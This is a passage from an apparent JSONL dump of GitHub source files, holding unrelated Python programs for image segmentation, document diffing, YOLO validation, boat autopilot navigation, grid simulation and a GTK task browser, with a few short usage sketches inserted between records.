\")\n\n    def destroy_aplication(self):\n        string_text = 'x_' + str(self.x_crop) + '_y_' + str(self.y_crop) + '_name_' + str(self.name_tif)\n        with open(\"log_progress.txt\", \"ab\") as f:\n            f.write(string_text.encode('utf-8', 'ignore'))\n        root.destroy()\n
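A brief usage sketch (added, not from the repo) of the type_shape codes documented in load_shp above; `iface` stands for a hypothetical Interface instance and 'mosaic.tif' is a placeholder path:

# type_shape: 0 = mosaic, 1 = reference shape, 2 = neural-network shape, 3 = both
tif_path, ref_shp, net_shp = iface.load_shp(type_shape=3, option='Compare Results')
# rasterise the chosen reference shapefile onto the mosaic grid as a binary GTiff
mask_tif = iface.shp_to_bin(ref_shp, 'mosaic.tif', burn=255)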
\nif __name__ == \"__main__\":\n\n    root = tk.Tk()\n    obj = Interface(root)\n    root.title('Semantic Segmentation Tools')\n    root.resizable(False,False)\n    obj.first_menu(root)\n    #Interface(root).run()\n    root.geometry(\"800x800+400+400\")\n    Exit1 = tk.Button(root, text=\"Sair\", command=obj.destroy_aplication)\n    Exit1.place(relx=0.019, rely=0.871, height=48, width=100)\n    root.mainloop()","repo_name":"betoecd/Anne","sub_path":"interface_tk/main_interface.py","file_name":"main_interface.py","file_ext":"py","file_size_in_byte":45686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28925310882","text":"import difflib\nimport os\nimport argparse\n\n\ndef mkdir():\n    current_folder = os.getcwd()\n    if os.path.exists(current_folder + \"/result/\"):\n        pass\n    else:\n        os.makedirs(current_folder + \"/result/\")\n\n\ndef _reader(path):\n    with open(path, \"r\") as f:\n        text = f.read().splitlines()\n    return text\n\n\ndef compare_doc(doc1, doc2):\n    current_folder = os.getcwd()\n    text1 = _reader(doc1)\n    text2 = _reader(doc2)\n    diff = difflib.HtmlDiff()\n    result = diff.make_file(text1, text2)\n    with open(current_folder + \"/result/result{}.html\".format(args.d1),\n              \"w\") as f:\n        f.write(result)\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-d1', type=str)\n    parser.add_argument('-d2', type=str)\n    args = parser.parse_args()\n    mkdir()\n    compare_doc(args.d1, args.d2)\n","repo_name":"XM-WANG/others","sub_path":"compare/wxm.py","file_name":"wxm.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10616861722","text":"import os\nimport json\nimport pprint\nimport platform\nimport argparse\nfrom pathlib import Path\nfrom datetime import datetime\n\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\n\nfrom dataset import Dataset\nfrom transform import BasicTransform, AugmentTransform\nfrom yolo import YoloModel\n\nfrom logger import build_basic_logger\n\nfrom utils import generate_random_color, transform_xcycwh_to_x1y1x2y2, filter_confidence, run_NMS, scale_coords, transform_x1y1x2y2_to_x1y1wh, imwrite, visualize_prediction, analyse_mAP_info\n\nSEED = 42\ntorch.manual_seed(SEED)\nTIMESTAMP = datetime.today().strftime(\"%Y-%m-%d_%H-%M\")\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#MEAN = 0.4333\n#STD = 0.2194\n\ndef to_tensor(image):\n    image = np.ascontiguousarray(image.transpose(2, 0, 1))\n    return torch.from_numpy(image).float()\n\n\ndef to_image(tensor, mean=(0.4333, 0.4333, 0.4333), std=(0.2194, 0.2194, 0.2194)):\n    denorm_tensor = tensor.clone()\n    for t, m, s in zip(denorm_tensor, mean, std):\n        t.mul_(s).add_(m)\n    denorm_tensor.clamp_(min=0, max=1.)\n    denorm_tensor *= 255\n    image = denorm_tensor.permute(1,2,0).numpy().astype(np.uint8)\n    return image\n\n@torch.no_grad()\ndef validate(class_list, color_list, mAP_filepath, dataloader, model, evaluator, epoch=0, save_result=False, conf_thres = 0.001, nms_thres = 0.6, img_log_dir=\"/workspace/storage/object-detection/yolov1/experiments/training-image\"):\n    \n    model.eval()\n    \n    with open(mAP_filepath, mode='r') as f:\n        json_file = json.load(f)\n    \n    cocoPred = []\n    check_images, check_preds, check_results = [], [], []\n    imageToid = json_file[\"imageToid\"]\n\n    for _, minibatch in enumerate(dataloader):\n        filenames, images, shapes = minibatch[0], minibatch[1], minibatch[3]\n        predictions = model(images.to(device))\n
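A small added sketch of how to_tensor and to_image above pair up, assuming the data pipeline normalises with the commented MEAN/STD values (0.4333/0.2194); the input image here is random dummy data:

img = np.random.randint(0, 256, (64, 64, 3), dtype=np.uint8)
t = to_tensor(img / 255.0)        # HWC array in [0, 1] -> CHW float tensor
t = (t - 0.4333) / 0.2194         # normalise the way the loader is assumed to
restored = to_image(t)            # undoes mean/std, rescales back to 0..255 uint8
assert restored.shape == img.shape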
\n        for j in range(len(filenames)):\n            prediction = predictions[j].cpu().numpy()\n            prediction[:, 1:5] = transform_xcycwh_to_x1y1x2y2(boxes=prediction[:, 1:5], clip_max=1.0)\n            prediction = filter_confidence(prediction=prediction, conf_threshold=conf_thres)\n            prediction = run_NMS(prediction=prediction, iou_threshold=nms_thres)\n\n            if len(check_images) < 5:\n                check_images.append(to_image(images[j]))\n                check_preds.append(prediction.copy())\n\n            if len(prediction) > 0:\n                filename = filenames[j]\n                shape = shapes[j]\n                cls_id = prediction[:, [0]]\n                conf = prediction[:, [-1]]\n                box_x1y1x2y2 = scale_coords(img1_shape=images.shape[2:], coords=prediction[:, 1:5], img0_shape=shape[:2])\n                box_x1y1wh = transform_x1y1x2y2_to_x1y1wh(boxes=box_x1y1x2y2)\n                img_id = np.array((imageToid[filename],) * len(cls_id))[:, np.newaxis]\n                cocoPred.append(np.concatenate((img_id, box_x1y1wh, conf, cls_id), axis=1))\n\n        del images, predictions\n\n    if (epoch % 10 == 0) and img_log_dir:\n        for k in range(len(check_images)):\n            check_image = check_images[k]\n            check_pred = check_preds[k]\n            check_result = visualize_prediction(image=check_image, prediction=check_pred, class_list=class_list, color_list=color_list)\n            check_results.append(check_result)\n        concat_result = np.concatenate(check_results, axis=1)\n        imwrite(str(img_log_dir +\"/\"+ f\"EP-{epoch:03d}.jpg\"), concat_result)\n\n    if len(cocoPred) > 0:\n        cocoPred = np.concatenate(cocoPred, axis=0)\n        mAP_dict, eval_text = evaluator(predictions=cocoPred)\n\n        if save_result:\n            np.savetxt(\"/workspace/storage/object-detection/yolov1/experiments/predictions.txt\", cocoPred, fmt=\"%.4f\", delimiter=\",\", header=f\"Inference results of [image_id, x1y1wh, score, label] on {TIMESTAMP}\")\n        return mAP_dict, eval_text\n    else:\n        return None, None\n\ndef result_analyis(class_list, mAP_dict, path=\"/workspace/storage/object-detection/yolov1/experiments\"):\n    analysis_result = analyse_mAP_info(mAP_dict, class_list)\n    data_df, figure_AP, figure_dets, fig_PR_curves = analysis_result\n    data_df.to_csv(str(path + f\"/result-AP.csv\"))\n    figure_AP.savefig(str(path + f\"/figure-AP.jpg\"))\n    figure_dets.savefig(str(path + f\"/figure-dets.jpg\"))\n    PR_curve_dir = path + \"/PR-curve\" \n    os.makedirs(PR_curve_dir, exist_ok=True)\n    for class_id in fig_PR_curves.keys():\n        fig_PR_curves[class_id].savefig(str(PR_curve_dir + f\"/{class_list[class_id]}.jpg\"))\n        fig_PR_curves[class_id].clf()\n","repo_name":"wilfredkisku/OBJECT-DETECTION-DNN","sub_path":"object-detection/yolov1/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20496158322","text":"import os\r\nimport cv2\r\nimport json\r\nimport time\r\nimport numpy as np\r\nimport threading\r\nfrom geographiclib.geodesic import Geodesic\r\n\r\n#\r\n# 0x1000 > 0x1100 : Speed\r\n# 0x0001 : Arm\r\n# 0x0010 : Disarm\r\n# 1x0000 : Return to Home (first waypoint)\r\n# 1x0001 : Start Autopilot\r\n# 1x0011 : Stop Autopilot\r\n# 2x-60 > 2x+60 : Rudder heading (direct)\r\n# 3x0000 : Stop everything\r\n#\r\n\r\nclass Nav:\r\n\r\n    def __init__(self):\r\n\r\n        self.GPS = []\r\n        self.escs = []\r\n        self.rudders = []\r\n        self.position = {}\r\n        self.waypoints = []\r\n        self.retHome = False\r\n        self.running = True\r\n        self.autopilot_running = True\r\n        self.depth = -1\r\n        self.depthshot = None\r\n        self.offset = 0\r\n        self.sample_ticker = 0\r\n        self.heading = -1\r\n        self.sats = -1\r\n\r\n\r\n    def report(self, message : str) -> None:\r\n\r\n        print(f\"[NAV] 
{message}\")\r\n\r\n    \r\n    # def add_esc(self, esc : object | list) -> None: (python3.10)\r\n    def add_esc(self, esc : object) -> None:\r\n\r\n        if isinstance(esc, list):\r\n            for esc_ in esc:\r\n                self.escs.append(esc_)\r\n            self.report(f\"Added {len(esc)} ESCs\")\r\n\r\n        else:\r\n            self.escs.append(esc)\r\n            self.report(\"Added ESC\")\r\n\r\n    #def add_rudder(self, rudder : object | list) -> None: (python3.10)\r\n    def add_rudder(self, rudder : object) -> None:\r\n\r\n        if isinstance(rudder, list):\r\n            for rudder_ in rudder:\r\n                self.rudders.append(rudder_)\r\n            self.report(f\"Added {len(rudder)} rudders\")\r\n\r\n        else:\r\n            self.rudders.append(rudder)\r\n            self.report(\"Added rudder\")\r\n\r\n\r\n    def handle_networking(self, recieved : list) -> bool:\r\n\r\n        for msg in recieved:\r\n\r\n            if msg[0:3] == \"0x1\":\r\n                for esc in self.escs:\r\n                    print(msg[3:])\r\n                    esc.set(int(msg[3:]))\r\n\r\n            elif msg[0:2] == \"2x\":\r\n                try:\r\n                    self.heading = int(msg[2:5])\r\n                    print(self.heading)\r\n                except:\r\n                    break\r\n\r\n                for rudder in self.rudders:\r\n                    rudder.set_heading(int(self.heading))\r\n\r\n            elif msg == \"0x0001\":\r\n                for esc in self.escs:\r\n                    esc.arm()\r\n\r\n            elif msg == \"0x0010\":\r\n                for esc in self.escs:\r\n                    esc.disarm()\r\n\r\n            elif msg == \"1x0000\":\r\n                self.return_home()\r\n\r\n            elif msg == \"1x0001\":\r\n                self.start_autopilot()\r\n\r\n            elif msg == \"1x0011\":\r\n                self.stop_autopilot()\r\n\r\n            elif msg == \"stop\" or msg == \"quit\" or msg == \"3x0000\":\r\n                self.retHome = False\r\n                for esc in self.escs:\r\n                    esc.disarm()\r\n                return False\r\n\r\n\r\n\r\n            # (python3.10)\r\n            \"\"\"\r\n            match msg:\r\n\r\n                case \"0x0001\":\r\n                    for esc in self.escs:\r\n                        esc.arm()\r\n\r\n                case \"0x0010\":\r\n                    for esc in self.escs:\r\n                        esc.disarm()\r\n\r\n                case \"1x0000\":\r\n                    self.return_home()\r\n\r\n                case \"1x0001\":\r\n                    self.start_autopilot()\r\n\r\n                case \"stop\" | \"quit\":\r\n                    self.retHome = False\r\n                    for esc in self.escs:\r\n                        esc.disarm()\r\n                    return False\r\n            \"\"\"\r\n            \r\n            recieved.remove(msg)\r\n\r\n        return True\r\n\r\n\r\n\r\n    def load_waypoints(self, filename : str) -> None:\r\n\r\n        with open(filename, \"r\") as f:\r\n            waypoints = json.load(f)\r\n            for wp in waypoints:\r\n                x = wp['lat']\r\n                y = wp['lng']\r\n                self.waypoints.append({'lat': x, 'lng': y})\r\n\r\n        self.report(f\"{len(self.waypoints)} waypoints loaded!\")\r\n\r\n\r\n    def get_heading(self, pos1 : dict, pos2 : dict) -> int:\r\n\r\n        if (len(pos1) > 0 and len(pos2) > 0) or not pos1['lat'] == None or not pos2['lat'] == None:\r\n\r\n            a = Geodesic.WGS84.Inverse(pos1['lat'], pos1['lng'], pos2['lat'], pos2['lng'])\r\n\r\n            bearing = a['azi1']\r\n            if bearing < 0:\r\n                bearing += 360\r\n            return round(bearing, 2)\r\n        else:\r\n            return False\r\n\r\n\r\n    def get_distance(self, pos1 : dict, pos2 : dict) -> float:\r\n\r\n        if (len(pos1) > 0 and len(pos2) > 0) or not pos1['lat'] == None or not pos2['lat'] == None:\r\n            a = Geodesic.WGS84.Inverse(pos1['lat'], pos1['lng'], pos2['lat'], pos2['lng'])\r\n            return round(a['s12'], 2)\r\n        else:\r\n            return False\r\n\r\n\r\n    def check_if_close(self, pos : dict) -> bool:\r\n\r\n        if self.position:\r\n            distance = self.get_distance(self.position, pos)\r\n            if distance <= 2: # within 2 m\r\n                return True\r\n        return False\r\n
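A minimal added sketch (not from the repo) of the message protocol documented at the top of nav.py driving handle_networking(); StubESC is a made-up stand-in for the real ESC driver:

class StubESC:
    def arm(self): print("ESC armed")
    def disarm(self): print("ESC disarmed")
    def set(self, value): print("ESC speed set to", value)

nav = Nav()
nav.add_esc(StubESC())
nav.handle_networking(["0x0001"])   # 0x0001 -> arm every registered ESC
nav.handle_networking(["0x1050"])   # "0x1" prefix -> speed command, value 50
nav.handle_networking(["3x0000"])   # stop everything; the handler returns False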
    \r\n    \r\n    def save_data(self, position, depth, heading, image):\r\n\r\n        if not depth == -1 and image.any():\r\n            with open(\"saved_data.json\", \"a\") as f:\r\n                f.write(f\"{self.sample_ticker},{position},{depth},{heading}\\n\")\r\n                cv2.imwrite(f\"samples/{self.sample_ticker}.jpg\", image)\r\n                print(f\"[SAVE DATA]\\t{self.sample_ticker},{position},{depth},{heading}\")\r\n                self.sample_ticker += 1\r\n\r\n\r\n    def show_simulated_route(self) -> None:\r\n\r\n        for pos, wp in enumerate(self.waypoints[:-1]):\r\n            heading = self.get_heading(wp, self.waypoints[pos+1])\r\n            distance = self.get_distance(wp, self.waypoints[pos+1])\r\n            print(f\"[AUTOPILOT SIMULATION] {pos}. Heading: {heading}, Distance: {distance}m\")\r\n\r\n\r\n    def return_home_(self) -> None:\r\n\r\n        self.retHome = True\r\n        last_time = time.time()\r\n        print_ = False\r\n\r\n        while not self.check_if_close(self.waypoints[0]):\r\n            if not self.retHome: break\r\n            if time.time() - last_time > 1:\r\n                print_ = True; last_time = time.time()\r\n\r\n            heading = self.get_heading(self.position, self.waypoints[0])\r\n            distance = self.get_distance(self.position, self.waypoints[0])\r\n\r\n            self.offset = int(heading - self.heading)\r\n\r\n            #for esc in self.escs:\r\n            #    esc.distance_compansation(distance)\r\n\r\n            for rudder in self.rudders:\r\n                rudder.heading_compansation(self.offset)\r\n\r\n            if print_: print(f\"[AUTOPILOT] ** RETURNING HOME ** Distance: {distance}\"); print_ = False\r\n\r\n    \r\n    def return_home(self) -> None:\r\n\r\n        threading._start_new_thread(self.return_home_, ())\r\n\r\n\r\n    def start_autopilot_(self) -> None:\r\n\r\n        self.report(\"Starting autopilot ...\"); time.sleep(1.5)\r\n        \r\n        last_time = time.time()\r\n        print_ = False\r\n\r\n        for i, waypoint in enumerate(self.waypoints):\r\n            while not self.check_if_close(waypoint):\r\n                \r\n                if not self.running or not self.autopilot_running or self.retHome: break\r\n\r\n                if time.time() - last_time > 1:\r\n                    print_ = True; last_time = time.time()\r\n\r\n                heading = self.get_heading(self.position, waypoint)\r\n                distance = self.get_distance(self.position, waypoint)\r\n\r\n                self.offset = int(heading - self.heading)\r\n                #print(f\"Heading to WP: {heading}\\tHeading: {round(self.heading, 2)}\\tOffset: {self.offset}\\tDistance: {distance}\")\r\n\r\n                #for esc in self.escs:\r\n                #    esc.distance_compansation(distance)\r\n\r\n                for rudder in self.rudders:\r\n                    rudder.heading_compansation(self.offset)\r\n\r\n                if print_:\r\n                    pass\r\n                    #self.save_data(self.position, self.depth, self.heading, self.depthshot)\r\n                    print(f\"[AUTOPILOT] {i}\\tSatellites: {self.sats}\\tHeading: {self.heading}\\tOffset: {self.offset}\\tDistance: {distance}m\\tPosition: {self.position}\"); print_ = False\r\n\r\n            # code for quick turn to waypoint (or not)\r\n\r\n        self.report(\"Route has completed!\"); time.sleep(1.5)\r\n        self.running = False\r\n\r\n        self.return_home()\r\n\r\n\r\n    def start_autopilot(self) -> None:\r\n\r\n        self.retHome = False\r\n        self.autopilot_running = True \r\n        threading._start_new_thread(self.start_autopilot_, ())\r\n\r\n\r\n    def stop_autopilot(self) -> None:\r\n        \r\n        self.autopilot_running = False\r\n\r\n\r\n#nav = Nav()\r\n#nav.load_waypoints(\"waypoints.json\")\r\n#nav.get_heading(nav.waypoints[0], nav.waypoints[1])\r\n\r\n#nav.show_simulated_route()\r\n#nav.start_autopilot()\r\n","repo_name":"DenEkteTruls/Hydromapper","sub_path":"nav/nav.py","file_name":"nav.py","file_ext":"py","file_size_in_byte":8925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
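For reference, a standalone sketch (added) of the geographiclib calls that Nav.get_heading and Nav.get_distance in the record above wrap; the coordinates are arbitrary example values:

from geographiclib.geodesic import Geodesic

pos1 = {'lat': 63.4305, 'lng': 10.3951}
pos2 = {'lat': 63.4400, 'lng': 10.4000}
g = Geodesic.WGS84.Inverse(pos1['lat'], pos1['lng'], pos2['lat'], pos2['lng'])
bearing = g['azi1'] % 360    # initial bearing in degrees, normalised to 0..360
distance = g['s12']          # geodesic distance in metres
print(round(bearing, 2), round(distance, 2))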
+{"seq_id":"15837113192","text":"# In general, for problems where you move around a grid by setting a direction, it is effective to define the directions in separate dx, dy lists.\nn, m = map(int, input().split())\n\nd = [[0] * m for _ in range(n)]\nx, y, direction = map(int, input().split())\nd[x][y] = 1 # mark the current coordinate as visited\n\n# read in the full map information\narray = []\nfor i in range(n):\n    array.append(list(map(int, input().split())))\n\n# define the directions: north, east, south, west\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n# rotate left\ndef turn_left():\n    global direction\n    direction -= 1\n    if direction == -1:\n        direction = 3\n\n# start the simulation\ncount = 1\nturn_time = 0\nwhile True:\n    # rotate left\n    turn_left()\n    nx = x + dx[direction]\n    ny = y + dy[direction]\n    # after rotating, move if the cell straight ahead has not been visited\n    if d[nx][ny] == 0 and array[nx][ny] == 0:\n        d[nx][ny] = 1\n        x = nx\n        y = ny\n        count += 1\n        turn_time = 0\n        continue\n    else:\n        turn_time += 1\n    \n    # when it is impossible to move in any of the four directions\n    if turn_time == 4:\n        nx = x - dx[direction]\n        ny = y - dy[direction]\n        # step backwards if that cell is open\n        if array[nx][ny] == 0:\n            x = nx\n            y = ny\n        # if the cell behind is blocked by sea\n        else:\n            break\n        turn_time = 0\n\nprint(count)\n\n","repo_name":"mark1346/coding_test_study","sub_path":"sehun/C12/P2/구현P2_E4-4.py","file_name":"구현P2_E4-4.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
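The record above opens by noting that grid-movement problems are easiest with separate dx/dy direction lists; a tiny standalone illustration of that idiom (added):

# direction index: 0 = north, 1 = east, 2 = south, 3 = west
dx = [-1, 0, 1, 0]
dy = [0, 1, 0, -1]
x, y, direction = 2, 2, 1            # start at row 2, column 2, facing east
nx, ny = x + dx[direction], y + dy[direction]
print((nx, ny))                      # (2, 3): one step east in (row, col) terms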
+{"seq_id":"15750355409","text":"#!/usr/bin/env python\n\nimport gi\nimport json\nimport webbrowser\ngi.require_version('Gtk', '3.0')\n\nfrom gi.repository import Gio\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GdkPixbuf\nfrom gi.repository import GObject\n\n\norganizations = {\n    5382353857806336: \"Apertium\",\n    4814441002565632: \"BRL-CAD\",\n    6426002725011456: \"CCExtractor Development\",\n    4809822100783104: \"Copyleft Games\",\n    5129917289201664: \"Drupal\",\n    6707477701722112: \"FOSSASIA\",\n    5761416665497600: \"Haiku Inc\",\n    5186916471275520: \"KDE\",\n    4794680462016512: \"MetaBrainz Foundation\",\n    5084291717398528: \"Mifos Initiative\",\n    5452182442737664: \"MovingBlocks\",\n    5747383933599744: \"OpenMRS\",\n    5114486142795776: \"Sugar Labs\",\n    5770017069072384: \"Sustainable Computing Research Group ( SCoRe )\",\n    6025234696110080: \"Systers, an Anita Borg Institute Community\",\n    5385807011512320: \"Wikimedia\",\n    4718815233441792: \"Zulip\"\n}\n\n\nTAGS = {1: [\"img/code.svg\", \"Code\"],\n        2: [\"img/userinterface.svg\", \"User Interface\"],\n        3: [\"img/doc.svg\", \"Documentation / Training\"],\n        4: [\"img/qa.svg\", \"Quality Assurance\"],\n        5: [\"img/outreach.svg\", \"Outreach / Research\"]\n        }\n\n\nclass WindowWithHeader(Gtk.Window):\n\n    def __init__(self, title):\n        Gtk.Window.__init__(self)\n\n        self.title_bar = Header(title)\n        self.set_titlebar(self.title_bar)\n        self.show_all()\n\n\nclass Header(Gtk.HeaderBar):\n\n    def __init__(self, title):\n        Gtk.HeaderBar.__init__(self)\n\n        self.set_show_close_button(True)\n        self.set_title(title)\n\n\nclass Button(Gtk.Button):\n\n    def __init__(self, icon_name, tooltip):\n        Gtk.Button.__init__(self)\n\n        icon = Gio.ThemedIcon(name=icon_name)\n        image = Gtk.Image.new_from_gicon(icon, Gtk.IconSize.BUTTON)\n        self.add(image)\n\n        Tooltip(self, tooltip)\n\n\nclass Tooltip(Gtk.Popover):\n\n    def __init__(self, button, text):\n        Gtk.Popover.__init__(self)\n\n        label = Gtk.Label(label=text)\n\n        button.connect(\"leave-notify-event\", self._hide)\n        button.connect(\"enter-notify-event\", self._show)\n\n        self.set_border_width(6)\n        self.set_relative_to(button)\n        self.set_modal(False)\n\n        self.add(label)\n\n    def _show(self, event, button):\n        self.show_all()\n\n    def _hide(self, event, button):\n        self.hide()\n\n\nclass Alert(Gtk.InfoBar):\n\n    def __init__(self, text):\n        Gtk.InfoBar.__init__(self)\n\n        label = Gtk.Label(label=\"%s\" % text)\n        label.set_use_markup(True)\n        self.get_content_area().add(label)\n\n        self.set_border_width(8)\n        self.set_show_close_button(True)\n        self.set_message_type(Gtk.MessageType.ERROR)\n\n    def do_response(self, event):\n        self.destroy()\n\n\nclass TasksList(Gtk.ListBox):\n\n    def __init__(self):\n        Gtk.ListBox.__init__(self)\n        self.limit = 0\n        self.total_tasks = 0\n        self.showed_tasks = []\n        self.filtered_tasks = []\n        self.add_tasks()\n\n    def clean_tasks(self):\n        for task in self.get_children():\n            self.remove(task)\n\n        self.showed_tasks = []\n        self.filtered_tasks = []\n        self.limit = 0\n\n    def add_tasks(self):\n        f = open(\"tasks.json\", \"r\")\n        tasks = json.load(f)['results']\n        f.close()\n\n        self.limit += 50\n        self.total_tasks = len(tasks)\n\n        for task in tasks:\n            if task in self.showed_tasks:\n                continue\n\n            if len(self.showed_tasks) > self.limit:\n                if len(self.showed_tasks) < self.total_tasks:\n                    widget = ShowMoreTasks(self)\n                    self.add(widget)\n                break\n\n            self.add(TaskInterface(task))\n            self.showed_tasks.append(task)\n\n        if len(self.showed_tasks) == self.total_tasks:\n            widget = ShowMoreTasks(self, True)\n            self.add(widget)\n\n    def filter(self, text):\n        for task_widget in self.get_children():\n            if not text:\n                task_widget.show()\n                continue\n\n            task = task_widget.get_children()[0]\n            if isinstance(task, ShowMoreTasks):\n                task_widget.hide()\n            elif isinstance(task, TaskInterface):\n                if text in task.task_name:\n                    task_widget.show()\n                else:\n                    task_widget.hide()\n\n\nclass TaskInterface(Gtk.Box):\n\n    def __init__(self, test_task):\n        Gtk.Box.__init__(self, orientation=Gtk.Orientation.VERTICAL)\n\n        organization_label = Gtk.Label()\n        organization_label.set_text(\"%s\" %\n                                    organizations[\n                                        test_task[\"organization_id\"]].upper())\n        organization_label.set_use_markup(True)\n        organization_label.set_size_request(400, 30)\n        organization_label.set_xalign(0)\n        organization_label.props.margin_left = 5\n        organization_label.props.margin_top = 5\n\n        self.task_name = test_task[\"name\"]\n\n        task_name = Gtk.Label(test_task[\"name\"])\n        task_name.set_xalign(0)\n        task_name.props.margin_left = 5\n        task_name.props.margin_top = 5\n        task_name.set_line_wrap(True)\n\n        task_description_expander = Gtk.Expander(label=\"Description\")\n\n        task_description = Gtk.Label(test_task[\"description\"])\n        task_description.props.xpad = 30\n        task_description.set_yalign(0)\n        task_description.set_xalign(0)\n        task_description.set_line_wrap(True)\n\n        task_description_expander.add(task_description)\n\n        header = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n        header.pack_start(organization_label, False, False, 0)\n        header.pack_end(\n            Icon(days=test_task[\"time_to_complete_in_days\"]),\n            False,\n            False,\n            5)\n\n        icon = Icon(tags=test_task[\"tags\"])\n        if not icon.is_none:\n            header.pack_end(icon, False, False, 5)\n\n        icon = Icon(beginner=test_task[\"is_beginner\"])\n        if not icon.is_none:\n            header.pack_end(icon, False, False, 5)\n\n        subheader = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n        subheader.pack_start(task_name, False, False, 0)\n        for cat in test_task[\"categories\"]:\n            subheader.pack_end(Icon(category=cat), False, False, 5)\n\n        subsubheader = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n        subsubheader.pack_start(task_description_expander, True, True, 0)\n\n        icon = Icon(url=test_task[\"external_url\"])\n        if not icon.is_none:\n            subsubheader.pack_end(icon, False, False, 5)\n        self.pack_start(header, False, False, 0)\n        self.pack_start(subheader, False, False, 0)\n        self.pack_end(subsubheader, True, True, 10)\n\n        self.show_all()\n\n\nclass ScrolledWindow(Gtk.ScrolledWindow):\n\n    def 
__init__(self, widget):\n        Gtk.ScrolledWindow.__init__(self)\n\n        self.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)\n        self.add_with_viewport(widget)\n        self.show_all()\n\n\nclass Icon(Gtk.EventBox):\n\n    def __init__(\n            self,\n            category=None,\n            scale=24,\n            days=0,\n            tags=None,\n            beginner=False,\n            mentors=None,\n            url=None):\n        Gtk.EventBox.__init__(self)\n\n        self.is_none = False\n        img = Gtk.Image()\n        path = None\n\n        if category:\n            path = TAGS[category][0]\n            Tooltip(self, TAGS[category][1])\n\n        elif days > 1:\n            path = \"img/time.svg\"\n            Tooltip(self, \"%d days\" % days)\n\n        elif tags:\n            path = \"img/tags.svg\"\n            text = \"Tags:\\n\"\n            for tag in tags:\n                text += \" %s\\n\" % tag\n\n            if text.endswith(\"\\n\"):\n                text = text[:-1]\n\n            Tooltip(self, text)\n\n        elif beginner:\n            path = \"img/beginner.svg\"\n            Tooltip(self, \"Beginner task\")\n\n        elif mentors:\n            path = \"img/mentors.svg\"\n            text = \"Mentors:\\n\"\n            for mentor in mentors:\n                text += \" %s\\n\" % mentor\n\n            if text.endswith(\"\\n\"):\n                text = text[:-1]\n\n            Tooltip(self, text)\n\n        elif url:\n            path = \"img/link.svg\"\n            text = \"External URL (double click to open):\\n%s\" % url\n            self.connect(\"button-press-event\", self._openlink, url)\n            Tooltip(self, text)\n\n        if path:\n            pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_scale(\n                path, scale, scale, True)\n            img.set_from_pixbuf(pixbuf)\n        else:\n            self.is_none = True\n\n        self.add(img)\n        self.show_all()\n\n    def _openlink(self, widget, event, url):\n        if event.type == 5:  # 5 == GDK 2BUTTON_PRESS, i.e. a double click\n            webbrowser.open(url)\n\n\nclass ShowMoreTasks(Gtk.EventBox):\n\n    def __init__(self, tasks_list, last=False):\n        Gtk.EventBox.__init__(self)\n        self.tasks_list = tasks_list\n\n        self.label = Gtk.Label()\n        if not last:\n            self.label.set_text(\n                \"Show more (+50) tasks!\\n-The application may work slowly-\\n(Double click)\")\n            self.label.set_use_markup(True)\n            self.label.set_justify(Gtk.Justification.CENTER)\n            self._id = self.connect(\"button-press-event\", self.button_press)\n\n        if last:\n            self.label.set_text(\"End of the list. 
:(\")\n self.set_sensitive(False)\n\n self.add(self.label)\n self.show_all()\n\n def button_press(self, widget, event):\n if event.type == 5:\n self.disconnect(self._id)\n showed_tasks = len(self.tasks_list.showed_tasks)\n self.label.set_text(\"%d/%d\" %\n (showed_tasks, self.tasks_list.total_tasks))\n self.set_sensitive(False)\n self.tasks_list.add_tasks()\n\n\nclass SearchButton(Gtk.ToggleButton):\n\n def __init__(self, searchbar, tasks_list):\n Gtk.ToggleButton.__init__(self)\n\n self.searchbar = searchbar\n self.tasks_list = tasks_list\n\n icon = Gio.ThemedIcon(name=\"find\")\n image = Gtk.Image.new_from_gicon(icon, Gtk.IconSize.BUTTON)\n Tooltip(self, \"Search task\")\n self.add(image)\n\n searchbar.connect('search-changed', self.search_changed)\n\n def do_toggled(self):\n self.searchbar.set_search_mode(self.get_active())\n if not self.get_active():\n self.tasks_list.filter(None)\n\n def search_changed(self, widget, text):\n self.tasks_list.filter(text)\n\n\nclass SearchBar(Gtk.SearchBar):\n\n __gsignals__ = {\n 'search-changed': (GObject.SIGNAL_RUN_FIRST,\n GObject.TYPE_NONE, (GObject.TYPE_STRING,))}\n\n def __init__(self):\n Gtk.SearchBar.__init__(self)\n\n searchentry = Gtk.SearchEntry()\n searchentry.set_placeholder_text(\"Search task, by title\")\n self.connect_entry(searchentry)\n self.add(searchentry)\n\n searchentry.set_size_request(1024, -1)\n searchentry.connect(\"search-changed\", self.search_changed)\n\n def search_changed(self, widget):\n self.emit('search-changed', widget.get_text())\n","repo_name":"i5o/codein-gtk","sub_path":"widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":11285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40444124914","text":"# 21.py -- Merge Two Sorted List\n\n'''\nDescription:\nMerge two sorted linked lists and return it as a new sorted list. 
